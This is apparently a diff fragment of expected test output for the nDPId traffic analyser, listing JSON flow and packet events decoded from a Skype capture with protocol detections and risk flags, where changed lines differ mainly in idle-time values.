00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431970688320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688320,"pkt":"0NQSxnP1PBXCt3IOCABFAAAukPgAAEARnzfAqAEinTfrjTLdAbsAGuidfHYCyiJR+IygHiSHdyp3P0rG"} 
00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1431970688626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688626,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NhhAAEAGpAHAqAEiUVNNjchbROcBp2a1GMO4z4AQECwRkQAAAQEICj4yWIkAvBWs"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688781,"flow_last_seen":1431970688781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688781,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431970688781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwP5AAEAGaDbAqAEiR+4Hy8hcSU\/pBV4yAAAAALAC\/\/81QAAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688782,"flow_last_seen":1431970688782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688782,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431970688782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688782,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUvJAAEAGZSbAqAEiBfi63chdeSKNyxjDAAAAALAC\/\/80+QAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1431970688888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688888,"pkt":"PBXCt3IO0NQSxnP1CABFAABA75tAAHIGlnwF+LrdwKgBInkiyF33HT2hjcsYxLASRBBSegAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1431970688888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688888,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TDBAAEAGa\/TAqAEiBfi63chdeSKNyxjE9x09ooAQECwvYwAAAQEICj4yWYwAAAAA"} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1431970688998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688998,"pkt":"PBXCt3IO0NQSxnP1CABFAABArvNAAHMGR0FH7gfLwKgBIklPyFwwtyOw6QVeM7AS\/\/93KQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1431970688998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688998,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ublAAEAGb4fAqAEiR+4Hy8hcSU\/pBV4zMLcjsYAQECwPmAAAAQEICj4yWfYAAAAA"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970689672,"flow_last_seen":1431970689672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970689672,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431970689672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970689672,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2ypAAEAG\/uLAqAEiUVNNjcheROdnq4JVAAAAALAC\/\/9ETAAAAgQFtAEDAwUBAQgKPjJcjQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431970689742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970689742,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CCFAAHQGnfBRU02NwKgBIkTnyF6euo9OZ6uCVqASIADwZAAAAgQFrAEDAwgEAggKALwWGz4yXI0="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1431970688626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688626,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NhhAAEAGpAHAqAEiUVNNjchbROcBp2a1GMO4z4AQECwRkQAAAQEICj4yWIkAvBWs"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688781,"flow_last_seen":1431970688781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688781,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431970688781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwP5AAEAGaDbAqAEiR+4Hy8hcSU\/pBV4yAAAAALAC\/\/81QAAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688782,"flow_last_seen":1431970688782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688782,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431970688782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688782,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUvJAAEAGZSbAqAEiBfi63chdeSKNyxjDAAAAALAC\/\/80+QAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1431970688888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688888,"pkt":"PBXCt3IO0NQSxnP1CABFAABA75tAAHIGlnwF+LrdwKgBInkiyF33HT2hjcsYxLASRBBSegAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1431970688888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688888,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TDBAAEAGa\/TAqAEiBfi63chdeSKNyxjE9x09ooAQECwvYwAAAQEICj4yWYwAAAAA"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1431970688998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688998,"pkt":"PBXCt3IO0NQSxnP1CABFAABArvNAAHMGR0FH7gfLwKgBIklPyFwwtyOw6QVeM7AS\/\/93KQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1431970688998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688998,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ublAAEAGb4fAqAEiR+4Hy8hcSU\/pBV4zMLcjsYAQECwPmAAAAQEICj4yWfYAAAAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970689672,"flow_last_seen":1431970689672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970689672,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431970689672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970689672,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2ypAAEAG\/uLAqAEiUVNNjcheROdnq4JVAAAAALAC\/\/9ETAAAAgQFtAEDAwUBAQgKPjJcjQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431970689742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970689742,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CCFAAHQGnfBRU02NwKgBIkTnyF6euo9OZ6uCVqASIADwZAAAAgQFrAEDAwgEAggKALwWGz4yXI0="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431970690133,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970690133,"pkt":"0NQSxnP1PBXCt3IOCABFAABEeJ0AAEARfpjAqAEiwKgBAemMADUAMK9udVgBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 
00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431970690190,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970690190,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA16YwAQDU7dViBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAsABBfOIaY="} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
